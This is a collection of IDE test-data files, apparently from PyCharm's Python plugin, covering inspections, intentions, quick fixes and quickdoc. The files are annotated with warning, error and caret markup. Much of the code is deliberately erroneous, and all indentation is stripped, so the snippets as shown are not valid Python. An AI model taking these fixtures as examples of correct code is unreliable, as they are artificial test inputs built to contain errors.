e2f = [(e, f) for <warning descr="Redeclared '_a' defined above without usage">_a</warning>, e, f in [(1, 2, 3)]]
array = [1, 2, 3]
<warning descr="Redeclared '_a' defined above without usage">_a</warning>, mid, <warning descr="Redeclared '_a' defined above without usage">_a</warning> = array
```
#### File: inspections/PyRedundantParenthesesInspection/Return.py
```python
def f1(x):
return (x, *x)
def f2(x):
return <weak_warning descr="Remove redundant parentheses">(x, x)</weak_warning>
```
#### File: inspections/PyStringFormatInspection/NewStyleCallExpressionArgument.py
```python
def f(mode):
if mode == "i":
return 1
elif mode == "f":
return 1.0
elif mode == "s":
return ""
elif mode == "b":
return True
<warning descr="Too few arguments for format string">"{}{}"</warning>.format(f("i"))
<warning descr="Too few arguments for format string">"{}{}"</warning>.format(f("f"))
<warning descr="Too few arguments for format string">"{}{}"</warning>.format(f("s"))
<warning descr="Too few arguments for format string">"{}{}"</warning>.format(f("b"))
```
#### File: inspections/PyStringFormatInspection/PercentStringCallArgument.py
```python
def bar():
return 1
"%s %s" % <warning descr="Too few arguments for format string">bar()</warning>
def bar():
return 1.0
"%s %s" % <warning descr="Too few arguments for format string">bar()</warning>
def bar():
return ""
"%s %s" % <warning descr="Too few arguments for format string">bar()</warning>
def bar():
return True
"%s %s" % <warning descr="Too few arguments for format string">bar()</warning>
def bar():
return []
"%s %s" % <warning descr="Too few arguments for format string">bar()</warning>
def bar():
return {}
"%s %s" % <warning descr="Too few arguments for format string">bar()</warning>
def bar():
return set()
"%s %s" % <warning descr="Too few arguments for format string">bar()</warning>
```
#### File: inspections/PyTypeCheckerInspection/Assignment.py
```python
def f():
x1: int = <warning descr="Expected type 'int', got 'str' instead">'foo'</warning>
x2: str = 'bar'
x3: int = 0
x4: str = <warning descr="Expected type 'str', got 'int' instead">1</warning>
```
#### File: inspections/PyTypeCheckerInspection/CallableInstanceAgainstCallable.py
```python
from typing import Dict
class Key:
def __call__(self, obj):
pass
def foo(d: Dict[str, int]):
print(sorted(d.items(), key=Key()))
```
#### File: inspections/PyTypeCheckerInspection/ComparisonOperators.py
```python
def test():
def f(x):
"""
:type x: str
"""
pass
class C(object):
def __gt__(self, other):
return []
o = object()
c = C()
f(<warning descr="Expected type 'str', got 'bool' instead">1 < 2</warning>)
f(<warning descr="Expected type 'str', got 'bool' instead">o == o</warning>)
f(<warning descr="Expected type 'str', got 'bool' instead">o >= o</warning>)
f(<warning descr="Expected type 'str', got 'bool' instead">'foo' > 'bar'</warning>)
f(<warning descr="Expected type 'str', got 'bool' instead"><warning descr="Expected type 'int', got 'C' instead">c</warning> < 1</warning>)
f(<warning descr="Expected type 'str', got 'list' instead">c > 1</warning>)
f(<warning descr="Expected type 'str', got 'bool' instead">c == 1</warning>)
f(<warning descr="Expected type 'str', got 'bool' instead">c in [1, 2, 3]</warning>)
```
#### File: inspections/PyTypeCheckerInspection/DictLiteralIndexing.py
```python
def test(k1, v1):
d = {k1: v1}
return 1 + d[k1]
```
#### File: PyTypeCheckerInspection/FieldWithNoneInStub/a.py
```python
from m1 import C
def f(x):
"""
:type x: int
"""
pass
def test():
f(C.foo)
```
#### File: inspections/PyTypeCheckerInspection/GeneratorAnnotatedToReturnIterable.py
```python
from typing import Iterable
def g1() -> Iterable[int]:
for i in range(10):
yield i
def g2() -> Iterable[int]:
yield 42
return None
def g3() -> Iterable:
yield 42
def g4() -> Iterable:
yield 42
return None
```
#### File: PyTypeCheckerInspection/InitializingDataclass/a.py
```python
import dataclasses
import typing
@dataclasses.dataclass
class A:
x: int
y: str
z: float = 0.0
A(1, "a")
A(<warning descr="Expected type 'int', got 'str' instead">"a"</warning>, <warning descr="Expected type 'str', got 'int' instead">1</warning>)
A(1, "a", 1.0)
A(<warning descr="Expected type 'int', got 'str' instead">"a"</warning>, <warning descr="Expected type 'str', got 'int' instead">1</warning>, <warning descr="Expected type 'float', got 'str' instead">"b"</warning>)
@dataclasses.dataclass(init=True)
class A2:
x: int
y: str
z: float = 0.0
A2(1, "a")
A2(<warning descr="Expected type 'int', got 'str' instead">"a"</warning>, <warning descr="Expected type 'str', got 'int' instead">1</warning>)
A2(1, "a", 1.0)
A2(<warning descr="Expected type 'int', got 'str' instead">"a"</warning>, <warning descr="Expected type 'str', got 'int' instead">1</warning>, <warning descr="Expected type 'float', got 'str' instead">"b"</warning>)
@dataclasses.dataclass(init=False)
class B1:
x: int = 1
y: str = "2"
z: float = 0.0
B1(1)
B1("1")
B1(1, "a")
B1("a", 1)
B1(1, "a", 1.0)
B1("a", 1, "b")
@dataclasses.dataclass(init=False)
class B2:
x: int
y: str
z: float = 0.0
def __init__(self, x: int):
self.x = x
self.y = str(x)
self.z = 0.0
B2(1)
B2(<warning descr="Expected type 'int', got 'str' instead">"1"</warning>)
@dataclasses.dataclass
class C1:
a: typing.ClassVar[int]
b: int
C1(1)
C1(<warning descr="Expected type 'int', got 'str' instead">"1"</warning>)
@dataclasses.dataclass
class C2:
a: typing.ClassVar
b: int
C2(1)
C2(<warning descr="Expected type 'int', got 'str' instead">"1"</warning>)
@dataclasses.dataclass
class D1:
a: dataclasses.InitVar[int]
b: int
D1(1, 2)
D1(<warning descr="Expected type 'int', got 'str' instead">"1"</warning>, <warning descr="Expected type 'int', got 'str' instead">"2"</warning>)
@dataclasses.dataclass
class E1:
a: int = dataclasses.field()
b: str = dataclasses.field(init=True)
c: int = dataclasses.field(init=False)
d: bytes = dataclasses.field(default=b"b")
e: int = dataclasses.field(default_factory=int)
E1(1, "1")
E1(<warning descr="Expected type 'int', got 'str' instead">"1"</warning>, <warning descr="Expected type 'str', got 'int' instead">1</warning>)
E1(1, "1", b"1")
E1(<warning descr="Expected type 'int', got 'bytes' instead">b"1"</warning>, "1", <warning descr="Expected type 'bytes', got 'int' instead">1</warning>)
E1(1, "1", b"1", 1)
E1(<warning descr="Expected type 'int', got 'str' instead">"1"</warning>, <warning descr="Expected type 'str', got 'bytes' instead">b"1"</warning>, <warning descr="Expected type 'bytes', got 'str' instead">"1"</warning>, <warning descr="Expected type 'int', got 'str' instead">"1"</warning>)
@dataclasses.dataclass
class F1:
foo = "bar" # <- has no type annotation, so doesn't count.
baz: str
F1("1")
F1(<warning descr="Expected type 'str', got 'int' instead">1</warning>)
```
#### File: inspections/PyTypeCheckerInspection/IterateOverParamWithNoAttributes.py
```python
def f(xs):
ys = 'string'
for x in xs:
g(ys)
def g(x):
return x.lower()
```
#### File: inspections/PyTypeCheckerInspection/KeywordArguments.py
```python
def foo(**kwargs):
"""
:type kwargs: int
"""
pass
foo(key1=10, <warning descr="Expected type 'int', got 'str' instead">key2="str"</warning>)
```
#### File: inspections/PyTypeCheckerInspection/NamedTupleBaseClass.py
```python
from collections import namedtuple
class C(namedtuple('C', ['foo', 'bar'])):
pass
def f(x):
return x.foo, x.bar
def g():
x = C(foo=0, bar=1)
return f(x)
print(g())
```
#### File: inspections/PyTypeCheckerInspection/NewTypeAsParameter.py
```python
from typing import NewType
UserId = NewType("UserId", int)
def get_user(user: UserId) -> str:
pass
get_user(UserId(5))
get_user(<warning descr="Expected type 'UserId', got 'str' instead">"John"</warning>)
get_user(<warning descr="Expected type 'UserId', got 'int' instead">4</warning>)
```
#### File: PyTypeCheckerInspection/NotImportedClassInDocString/a.py
```python
def f(x):
"""
:type x: p1.m1.Foo
"""
def test():
f(<warning descr="Expected type 'Foo', got 'int' instead">10</warning>)
```
#### File: inspections/PyTypeCheckerInspection/PromotingBytearrayToStrAndUnicode.py
```python
def f(bar):
# type: (str) -> str
return bar
f(bytearray())
```
#### File: inspections/PyTypeCheckerInspection/TypingListSubscriptionExpression.py
```python
from typing import List, Any
def f(x1: List[str],
x2: List['str'],
x3: List[Any]) -> None:
pass
```
#### File: inspections/PyTypeCheckerInspection/TypingProtocolAgainstProtocol.py
```python
from typing import Protocol
class MyProtocol1(Protocol):
attr: int
def func(self, p: int) -> str:
pass
class MyProtocol2(Protocol):
attr: int
more_attr: int
def func(self, p: int) -> str:
pass
def more_func(self, p: str) -> int:
pass
class MyProtocol3(Protocol):
attr: str
more_attr: str
def func(self, p: str) -> int:
pass
def more_func(self, p: int) -> str:
pass
def foo(p: MyProtocol1):
pass
v1: MyProtocol2
v2: MyProtocol3
foo(v1)
foo(<warning descr="Expected type 'MyProtocol1', got 'MyProtocol3' instead">v2</warning>)
```
#### File: inspections/PyUnboundLocalVariableInspection/LocalFunctionAndVariable.py
```python
def x(arg):
def foo(): pass
if arg: foo = None
callee(foo) #pass
```
#### File: inspections/PyUnboundLocalVariableInspection/PositiveIteration.py
```python
def test1():
for i in "abc":
j = 1
print(j)
def test2():
for i in (1, 2):
j = 1
print(j)
def test3():
for i in [1, 2]:
j = 1
print(j)
```
#### File: inspections/PyUnboundLocalVariableInspection/UnboundConditionalImport.py
```python
def f(c):
if c:
import sys
return <warning descr="Local variable 'sys' might be referenced before assignment">sys</warning>
```
#### File: inspections/PyUnboundLocalVariableInspection/UnboundNestedComprehension.py
```python
def f(xs):
# vs is unbound
return [(k, v) for v in <warning descr="Local variable 'vs' might be referenced before assignment">vs</warning>
for k, vs in xs.items()]
```
#### File: inspections/PyUnboundLocalVariableInspection/UnboundNonLocal.py
```python
def f1():
nonlocal <warning descr="Nonlocal variable 'x' must be bound in an outer function scope">x</warning> #fail
def f2():
def g():
nonlocal <warning descr="Nonlocal variable 'x' must be bound in an outer function scope">x</warning> #fail
print(x)
x = 1
def f3():
nonlocal <warning descr="Nonlocal variable 'x' must be bound in an outer function scope">x</warning> #fail
x = 2
def f4():
x = 0
def g():
nonlocal x #pass
x = 2
return x
return g()
```
#### File: inspections/PyUnresolvedReferencesInspection3K/asyncInitMethod.py
```python
class A:
<error descr="function \"__init__\" cannot be async">async</error> def __init__(self):
self.foo = '2'
self.bar = '3'
a = A()
print(a.foo)
```
#### File: inspections/PyUnresolvedReferencesInspection3K/descriptorAttribute.py
```python
from typing import Any
class StringDescriptor:
def __get__(self, instance, owner):
return 'foo'
class AnyDescriptor:
def __get__(self, instance, owner) -> Any:
return 'bar'
class ListDescriptor:
def __get__(self, instance: Any, owner: Any) -> list:
return 'baz'
class C:
foo = StringDescriptor()
bar = AnyDescriptor()
baz = ListDescriptor()
# Instance level
c = C()
c.foo.upper()
c.foo.<warning descr="Unresolved attribute reference 'non_existent' for class 'str'">non_existent</warning>()
c.bar.upper()
c.bar.non_existent()
c.baz.append()
c.baz.<warning descr="Unresolved attribute reference 'non_existent' for class 'list'">non_existent</warning>()
# Class level
C.foo.upper()
C.foo.<warning descr="Unresolved attribute reference 'non_existent' for class 'str'">non_existent</warning>()
C.bar.upper()
C.bar.non_existent()
```
#### File: inspections/PyUnresolvedReferencesInspection3K/metaclassMethods.py
```python
class M(type):
def baz(cls):
pass
class B(object):
def bar(self):
pass
class C(B, metaclass=M):
def foo(self):
pass
C.foo()
C.bar()
C.baz()
c = C()
c.foo()
c.bar()
c.<warning descr="Unresolved attribute reference 'baz' for class 'C'">baz</warning>()
```
#### File: PyUnresolvedReferencesInspection3K/MetaclassStub/m1.py
```python
class M(type):
def foo(cls):
pass
class C(metaclass=M):
pass
```
#### File: inspections/PyUnresolvedReferencesInspection3K/namedTuple.py
```python
from collections import namedtuple
Point = namedtuple('Point', ['x', 'y'], verbose=True)
print(Point.x, Point.y)
p = Point(11, y=22)
print(p.x + p.y + p.<warning descr="Unresolved attribute reference 'z' for class 'Point'">z</warning>)
print(p.__add__)
print(p._asdict())
print(Point._fields)
print(p._replace)
if isinstance(p, Point):
p.x
class C(namedtuple('C', 'x y')):
def f(self):
return self
c = C()
print(c.x, c.y, c.<warning descr="Unresolved attribute reference 'z' for class 'C'">z</warning>, c.f())
```
#### File: inspections/PyUnresolvedReferencesInspection3K/objectNewAttributes.py
```python
class C(object):
def __new__(cls):
self = object.__new__(cls)
self.foo = 1
return self
x = C()
print(x.foo)
print(x.<warning descr="Unresolved attribute reference 'bar' for class 'C'">bar</warning>)
```
#### File: PyUnresolvedReferencesInspection3K/PreferImportedModuleOverNamespacePackage/c.py
```python
class A:
def foo(self):
return "module"
```
#### File: inspections/PyUnresolvedReferencesInspection3K/typingIterableDunderGetItem.py
```python
import typing
def myfunc(seq: typing.Iterable[str]):
pass
```
#### File: PyUnresolvedReferencesInspection3K/UsageOfFunctionDecoratedWithTypesCoroutine/a.py
```python
import types
import asyncio
@types.coroutine
def foo():
yield from asyncio.sleep(1)
return 3
async def bar():
return await foo() * 2
```
#### File: inspections/PyUnresolvedReferencesInspection/classInClassBody.py
```python
class C:
print(<error descr="Unresolved reference 'C'">C</error>) #fail
def f(self):
print(C) #pass
```
#### File: inspections/PyUnresolvedReferencesInspection/decoratedFunction.py
```python
def decorator(f):
return f
def f(x):
return x
@decorator
def g(x):
return x
print(f.<warning descr="Cannot find reference 'foo' in 'function'">foo</warning>) #fail
print(g.bar) #pass
```
#### File: PyUnresolvedReferencesInspection/DunderAll/m3.py
```python
t = ["m3m2"]
__all__ = ["m3m1"]
__all__.extend(t)
def m3m1():
pass
def m3m2():
pass
def m3m3():
pass
```
#### File: PyUnresolvedReferencesInspection/DynamicDunderAll/m1.py
```python
__all__ = ["m1m1"] + abc
__all__.append("m1m2")
def m1m1():
pass
def m1m2():
pass
```
#### File: inspections/PyUnresolvedReferencesInspection/forwardReferencesInClassBody.py
```python
class A1:
foo = <error descr="Unresolved reference 'B1'">B1</error>()
class B1:
pass
class A21:
class A22:
bar = <error descr="Unresolved reference 'B2'">B2</error>()
class B2:
pass
class A31:
def baz(self):
class A32:
egg = B3()
class B3:
pass
```
#### File: PyUnresolvedReferencesInspection/MetaClassMembersInStubs/b.py
```python
class GenericMeta(type):
def __getitem__(self, args):
pass
class Generic(object):
__metaclass__ = GenericMeta
```
#### File: PyUnresolvedReferencesInspection/NonexistentLoggerMethod/logging.py
```python
def getLogger():
pass
class Logger(object):
def exception(self, msg):
pass
```
#### File: inspections/PyUnresolvedReferencesInspection/ownSlots.py
```python
def access1():
class B(object):
__slots__ = ['foo']
b = B()
print(b.<warning descr="Unresolved attribute reference 'baz' for class 'B'">baz</warning>)
print(b.foo)
def assign1():
class B(object):
__slots__ = ['foo']
b = B()
b.<warning descr="'B' object has no attribute 'bar'">bar</warning> = 1
b.foo = 1
def access2():
class A:
__slots__ = ['foo']
a = A()
print(a.<warning descr="Unresolved attribute reference 'foo' for class 'A'">foo</warning>)
print(a.<warning descr="Unresolved attribute reference 'bar' for class 'A'">bar</warning>)
def assign2():
class A:
__slots__ = ['foo']
a = A()
a.foo = 1
a.bar = 1
```
#### File: inspections/PyUnresolvedReferencesInspection/propertyNotListedInSlots.py
```python
class O(object):
__slots__ = ["a"]
def __init__(self):
self.b = 1
@property
def b(self):
return self.a
@b.setter
def b(self, value):
self.a = value
inst = O()
inst.b = 42
print(inst.a)
```
#### File: inspections/PyUnresolvedReferencesInspection/propertyType.py
```python
class Parent(object):
"""
parent class to show a simple property
"""
@property
def attribute(self):
"""
some attribute in parent
"""
return True
class Child(Parent):
"""
child class
"""
@property
def attribute(self):
"""
do something before executing the code of the parent attribute
"""
print "i'm the child"
return Parent.attribute.fget(self)
if __name__ == '__main__':
child = Child()
print child.attribute
```
#### File: inspections/PyUnresolvedReferencesInspection/returnSelfInSuperClass.py
```python
class C(object):
def get_self(self):
return self
class D(C):
def foo(self):
pass
d = D()
print(d.foo())
print(d.get_self().foo()) # pass
d = D()
print(D.foo(d))
print(D.get_self(d).foo(d)) # pass
```
#### File: PyUnresolvedReferencesInspection/StubsOfNestedClasses/a.py
```python
from b import Class2
class Class3(Class2):
class SubClass3(Class2.SubClass2):
def __init__(self, foo):
Class2.SubClass2.__init__(self, foo)
def test(self):
print(self.foo)
```
#### File: inspections/PyUnresolvedReferencesInspection/superclassAsLocal.py
```python
class A(object):
def method(self):
pass
C = A
class B(C):
pass
b = B()
b.method() #Unresolved attribute reference 'method' for class 'B'
```
#### File: inspections/PyUnresolvedReferencesInspection/typeAssertions.py
```python
def f(x):
if isinstance(x, list):
x = []
elif isinstance(x, dict):
return x.items() #pass
```
#### File: inspections/PyUnresolvedReferencesInspection/unresolvedSubscriptionOnClass.py
```python
class Foo(object):
def __getitem__(self, item):
return item
Foo<warning descr="Class 'type' does not define '__getitem__', so the '[]' operator cannot be used on its instances">[</warning>0]
```
#### File: inspections/PyUnusedLocalInspection/callingLocalsLeadsToUnusedParameter.py
```python
def outer(arg_one):
def inner():
print(locals())
print(arg_one)
return inner
```
#### File: inspections/PyUnusedLocalInspection/parameterInMethodWithEllipsis.py
```python
class A:
def bar(self, p):
...
```
#### File: inspections/PyUnusedLocalInspection/singleUnderscore.py
```python
def foo():
l = [42 for _ in xrange(100)]
print(l)
```
#### File: inspections/PyUnusedLocalInspection/tupleUnpacking.py
```python
def foo():
for x, y in [(1, 2)]:
print x
def test_vlu():
<error descr="Python version 2.6 does not support starred expressions as assignment targets">*<weak_warning descr="Local variable 'h' value is not used">h</weak_warning></error>, <weak_warning descr="Local variable 't' value is not used">t</weak_warning> = [1, 2, 3] # fail
def test_vlu():
<error descr="Python version 2.6 does not support starred expressions as assignment targets">*h</error>, t = [1, 2, 3] # pass
print(t)
```
#### File: testData/inspections/RenameUnresolvedReference.py
```python
def foo(y1):
<error descr="Unresolved reference 'y'">y<caret></error> + 1
print <error descr="Unresolved reference 'y'">y</error>
```
#### File: testData/intentions/convertStaticMethodToFunctionUsage.py
```python
class MyClass(object):
"""
My class to demonstrate the intention.
"""
def __init__(self):
self.a = 1
@staticmethod
def my_<caret>static_method():
import code
import time
time.sleep(100)
print code
MyClass().my_static_method()
```
#### File: testData/intentions/convertVariadicParamKeywordContainerPop.py
```python
def foo(w, <caret>q = 2, **kwargs):
a = kwargs.pop('tmp')
doSomething(kwargs.pop('foo', 22))
doSomething(kwargs.pop('bar', default=23))
```
#### File: testData/intentions/convertVariadicParamNotOverriddenInNested_after.py
```python
def outer(foo, bar=None, **kwargs):
def nested():
print(foo)
return bar
```
#### File: testData/intentions/convertVariadicParamOverriddenInNested_after.py
```python
def outer(bar=None, **kwargs):
def nested(**kwargs):
print(kwargs['foo'])
return bar
```
#### File: testData/intentions/convertVariadicParamPositionalContainerInPy3_after.py
```python
def foo(baz=None, *args, bar, **kwargs<caret>):
return bar
```
#### File: testData/intentions/joinIf_after.py
```python
def foo():
if a + 2 > 3 and b < 4:
a = a and b
b = 4
```
#### File: testData/intentions/numpyAddMissingParameterPreservesNoneIndent_after.py
```python
def f(param1, param2):
"""
Parameters
----------
param1
param2 : object
"""
```
#### File: testData/intentions/numpyAddMissingParameterPreservesNoneIndent.py
```python
def <caret>f(param1, param2):
"""
Parameters
----------
param2 : object
"""
```
#### File: testData/intentions/paramTypeInGoogleDocStringParamDeclaredNoParenthesis.py
```python
def f(<caret>x, y):
"""
Summary.
Parameters:
x : foo
"""
```
#### File: intentions/PyAnnotateTypesIntentionTest/methodAfterConstructorCall.py
```python
class MyClass:
def __init__(self):
pass
def method(self, x):
pass
x = MyClass()
foo = x.met<caret>hod(42)
```
#### File: intentions/PyAnnotateVariableTypeIntentionTest/annotationAugmentedAssignment.py
```python
def func():
var = 0
var += 1
v<caret>ar
```
#### File: PyAnnotateVariableTypeIntentionTest/AnnotationImportTypingAny/main.py
```python
def func(x):
var = {'foo': x}
v<caret>ar
```
#### File: intentions/PyAnnotateVariableTypeIntentionTest/typeCommentLocalWithTarget_after.py
```python
from typing import BinaryIO
def func():
with open('file.txt') as var: # type: [BinaryIO]
var
```
#### File: intentions/PyConvertMethodToPropertyIntentionTest/simple_after.py
```python
class MyClass(object):
"""
My class to demonstrate the intention.
"""
def __init__(self):
self._x = None
@property
def x(self):
return self._x
x = MyClass().x
```
#### File: testData/intentions/restNoReturnTagForInit_after.py
```python
class C:
def __init__(self, x, y):
"""
:param x:
:param y:
"""
return None
```
#### File: testData/intentions/typeAssertion4_after.py
```python
def foo3(x, y):
assert isinstance(y, object)
i = x + y
return i
```
#### File: testData/intentions/typeAssertion4.py
```python
def foo3(x, y):
i = x + <caret>y
return i
```
#### File: testData/intentions/typeAssertion_after.py
```python
def foo(a, b):
assert isinstance(a, object)
a.
b = 1
```
#### File: testData/intentions/typeInDocstring2.py
```python
def func1(x):
return x
def func2(x):
y = fu<caret>nc1(x.keys())
return y.startswith('foo')
```
#### File: testData/mover/indentedOneLine.py
```python
def a():
if True: a = 1
else:
c = <caret>1
b = 2
```
#### File: testData/mover/with_afterDown.py
```python
def temp(filepath):
a = 1
with open(filepath) as f:
for line in l:
l = f.readlines()
a = 1
```
#### File: testData/override/classmethod.py
```python
class A:
@classmethod
def foo(cls):
cls.k = 3
class B(A):
<caret>pass
```
#### File: testData/override/dunderNewPy3k_after.py
```python
class BaseMeta(type):
def __new__(cls, name, bases, namespace):
return super().__new__(cls, name, bases, namespace)
class MyMeta(BaseMeta):
def __new__(cls, name, bases, namespace):
return super().__new__(cls, name, bases, namespace)
```
#### File: testData/override/importsForTypeAnnotations1_after.py
```python
from .importsForTypeAnnotations1_import import Foo
class Bar(Foo):
def func(self, arg: int) -> int:
return super().func(arg)
```
#### File: testData/override/qualified_after.py
```python
import datetime
class MyDate(datetime.date):
def __init__(self, year, month, day):
<selection>super(MyDate, self).__init__(year, month, day)</selection>
```
#### File: testData/override/returnAnnotation.py
```python
class A():
def some_method(self) -> "return value":
pass
class B(A):
pass
```
#### File: testData/override/returnValue_after.py
```python
class A:
def doStuff(self, foo=True): return True
class B(A):
def doStuff(self, foo=True):
<selection>return A.doStuff(self, foo)</selection>
def otherMethod(self, foo, bar):
print foo, bar
```
#### File: testData/override/returnValue.py
```python
class A:
def doStuff(self, foo=True): return True
class B(A):
def otherMethod(self, foo, bar):
print foo, bar
```
#### File: testData/override/staticMethodPy3k_after.py
```python
class A:
@staticmethod
def m(x, y):
pass
class B(A):
@staticmethod
def m(x, y):
<selection>super().m(x, y)</selection>
```
#### File: testData/override/staticMethodPy3k.py
```python
class A:
@staticmethod
def m(x, y):
pass
class B(A):
<caret>pass
```
#### File: testData/paramInfo/BoundMethodSimple.py
```python
class A(object):
def foo(self, a, b):
pass
f = A().foo
f(<arg1>1, <arg2>2)
```
#### File: testData/paramInfo/ConstructorFactory.py
```python
class Foo(object):
def __init__(self, color):
self.color = color
class Bar(object):
fooFactory = Foo
def quux(self):
foo = self.fooFactory(<arg>"orange") #
```
#### File: paramInfo/DataclassesMixedHierarchyReplace/dataclasses.py
```python
def dataclass(_cls=None, *, init=True, repr=True, eq=True, order=False,
unsafe_hash=False, frozen=False):
pass
def replace(obj, **changes):
pass
```
#### File: testData/paramInfo/KwdArgOutOfOrder.py
```python
def foo(a, b, c):
pass
foo(<arg1>b=2, <arg2>**{'a':1, <arg2a>'c':3})
```
#### File: testData/paramInfo/NestedMultiArg.py
```python
def foo(a, (b, c), d):
pass
foo(<arg1>1, <arg23>range(2), <arg4>4)
```
#### File: testData/paramInfo/StarredFunction.py
```python
def foo(a, b, *c):
pass
foo(<arg1>1, <arg2>2, <arg3>3, <arg4>4)
```
#### File: testData/paramInfo/TupleAndNamedArg1.py
```python
def f(a, b, c):
pass
f(<arg_c>c=1, *(10, <arg_star>20))
```
#### File: postfix/isNotNone/complexExpression_after.py
```python
def f(a, b, c):
if (a + b) * c is not None:
<caret>
```
#### File: postfix/isNotNone/function_after.py
```python
def f(a):
if a is not None:
<caret>
```
#### File: postfix/return/if_after.py
```python
def d(a):
if a:
return 1
else:
return 2
```
#### File: testData/psi/AsyncFor.py
```python
async def f():
async for x in xs:
pass
async for y in ys:
pass
```
#### File: testData/psi/AwaitInNonAsyncNestedFunction.py
```python
import asyncio
async def connect():
def callback():
return await asyncio.sleep(5)
return await asyncio.sleep(5)
```
#### File: testData/psi/CommentBetweenClasses.py
```python
class T1(object):
def m1(self):
pass
# comment about T2
class T2(object):
def m2(self):
pass
```
#### File: testData/psi/EmptyBlockInFunctionBeforeFunction.py
```python
def foo(xs):
for x in xs:
def bar():
pass
```
#### File: type/comparisonOperatorOverloads/lib.py
```python
class MyClass:
def __init__(self, *args):
pass
def __lt__(self, other):
pass
def __gt__(self, other):
return True
```
#### File: type/instanceAttributeAnnotation/InstanceAttributeAnnotation.py
```python
class C:
def __init__(self):
self.attr = None
C().at<caret>tr
```
#### File: type/overloadedNotMatchedGenericType/OverloadedNotMatchedGenericType.py
```python
from typing import Any
from m1 import C
def f(x: list):
c = C()
<caret>expr = c.foo(non_existing=0)
```
#### File: type/overloadedNotMatchedType/OverloadedNotMatchedType.py
```python
from typing import Any
from m1 import C
def f(x: Any):
c = C()
<caret>expr = c.foo(x)
```
#### File: testData/quickdoc/AncestorClassDocstringForConstructor.py
```python
class Base:
"""Class docstring."""
class Sub(Base):
def __in<the_ref>it__(self):
pass
```
#### File: testData/quickdoc/ClassUndocumentedConstructor.py
```python
class Foo(object):
"<the_doc>Doc of Foo."
def __init__(self):
pass
<the_ref>Foo()
```
#### File: testData/quickdoc/ExceptionDescriptionRest.py
```python
def fu<the_ref>nc():
"""
:raises Exception1
:raise Exception2: bar
:except Exception3:
:exception Exception4: foo
"""
pass
```
#### File: testData/quickdoc/KeywordArgsDescriptionEpydoc.py
```python
def fu<the_ref>nc(**args):
"""
@kwarg foo: bar
@keyword baz:
@kwparam quux:
"""
```
#### File: testData/quickdoc/KeywordArgsDescriptionForMissingParameter.py
```python
class Base:
def method(self, **kwargs):
"""
:key foo: foo
:key bar: bar
:key baz:
"""
class Sub(Base):
def met<the_ref>hod(self, *, foo, bar):
super().method(foo=foo, bar=bar)
```
#### File: testData/quickdoc/KeywordArgsDescriptionGoogle.py
```python
def fu<the_ref>nc(**args):
"""
Keyword args:
foo: bar
baz
Keyword arguments:
quux
"""
```
#### File: testData/quickdoc/OptionalAndUnionTypesContainingTypeVars.py
```python
from typing import TypeVar, Optional, Union, Tuple, Any
T = TypeVar('T', int)
def f(x1: Optional[T], x2: Union[T, Tuple[Any, Any]]):
print(x1, x2)
<the_ref>f
```
#### File: testData/quickdoc/ParamDescriptionInheritedMismatched.py
```python
class Base:
def method(self, foo, bar):
"""
:param foo: description
:param bar: description
"""
pass
class Sub(Base):
def met<the_ref>hod(self, param1, param2):
pass
```
#### File: testData/quickdoc/PropOldUndefinedSetter.py
```python
class C(object):
def _get(self):
"""Docstring."""
return 42
attr = property(fget=_get)
C().at<the_ref>tr = 42
```
#### File: testData/quickdoc/TypeVars.py
```python
from typing import TypeVar, List
T1 = TypeVar('T1', int)
T2 = TypeVar('T2', int, str)
T3 = TypeVar('T3', List[bool])
def f(p1: T1, p2: T2, p3: T3):
pass
<the_ref>f()
```
#### File: quickFixes/PyAddExceptionSuperClassQuickFixTest/emptySuperList.py
```python
class MyException:
def __new__(cls, x):
pass
def foo():
raise <warning descr="Exception doesn't inherit from base 'Exception' class">My<caret>Exception()</warning>
```
#### File: quickFixes/PyAddFieldQuickFixTest/addFieldAddConstructor_after.py
```python
class A:
def __init__(self, a, b):
self.a = a
self.b = b
class B(A):
def __init__(self, a, b):
A.__init__(self, a, b)
self.x = None
def foo(self):
return self.x
```
#### File: quickFixes/PyAddFieldQuickFixTest/addFieldFromInstance_after.py
```python
class A:
def __init__(self):
self.y = None
self.x = 1
a = A()
a.y+1
```
#### File: quickFixes/PyAddFieldQuickFixTest/addFieldFromMethod.py
```python
class A:
def __init__(self):
self.x = 1
def foo(self):
a = self.<caret><warning descr="Unresolved attribute reference 'y' for class 'A'">y</warning>
```
#### File: quickFixes/PyAsyncCallQuickFixTest/addAwaitBeforeCall_after.py
```python
async def bar():
return "hey"
async def foo():
await bar()
return True
```
#### File: quickFixes/PyConvertToNewStyleQuickFixTest/slots.py
```python
class B: pass
class A(B):
<warning descr="Old-style class contains __slots__ definition">__<caret>slots__</warning> = ""
def <warning descr="Old-style class contains __getattribute__ definition">__getattribute__</warning>(self, item):
pass
```
#### File: quickFixes/PyCreatePropertyQuickFixTest/getter.py
```python
class C(object):
def __init__(self):
self._x = None
@x.setter
def x(self, value):
self._x = value
c = C()
print(<warning descr="Property 'x' cannot be read">c.<caret>x</warning>)
del <warning descr="Property 'x' cannot be deleted">c.x</warning>
c.x = 1
```
#### File: quickFixes/PyMakeFunctionFromMethodQuickFixTest/usageClassCallArgument_after.py
```python
def m(x):
print 1
class A:
pass
m(1)
```
#### File: quickFixes/PyMakePublicQuickFixTest/positive_after.py
```python
class A:
def __init__(self):
self.x = 1
def _foo(self):
print(self.x)
a = A()
a._foo()
print(a.x)
```
#### File: quickFixes/PyMoveExceptQuickFixTest/exceptChain.py
```python
def foo():
pass
try:
foo()
except NameError:
pass
except Exception:
pass
except <warning descr="'NameError', superclass of exception class 'UnboundLocalError', has already been caught">UnboundLocalE<caret>rror</warning>:
pass
```
#### File: quickFixes/PyRemoveArgumentQuickFixTest/duplicateArg_after.py
```python
def foo(*args):
pass
a = ()
b = ()
foo(*a)
```
#### File: quickFixes/PyRemoveArgumentQuickFixTest/duplicate.py
```python
def foo(a, p):
pass
foo(1, p=2, <error descr="Keyword argument repeated">p=3<caret>3</error>)
```
#### File: quickFixes/PyRemoveStatementQuickFixTest/function_after.py
```python
def foo(r):
"""
:param r:
:return:
"""
x = 1
x = 2
```
#### File: quickFixes/PyTypeHintsQuickFixTest/functionAnnotationAndTypeComment_after.py
```python
def bar(a):
# type: (int) -> int
pass
```
#### File: quickFixes/PyTypeHintsQuickFixTest/functionAnnotationAndTypeComment.py
```python
def <warning descr="Type(s) specified both in type comment and annotation">b<caret>ar</warning>(a: int) -> int:
<warning descr="Type(s) specified both in type comment and annotation"># type: (int) -> int</warning>
pass
```
#### File: quickFixes/PyUpdatePropertySignatureQuickFixTest/getterNoPararm.py
```python
class A(Aa):
@property
def <warning descr="Getter signature should be (self)">x<caret></warning>():
return ""
@x.setter
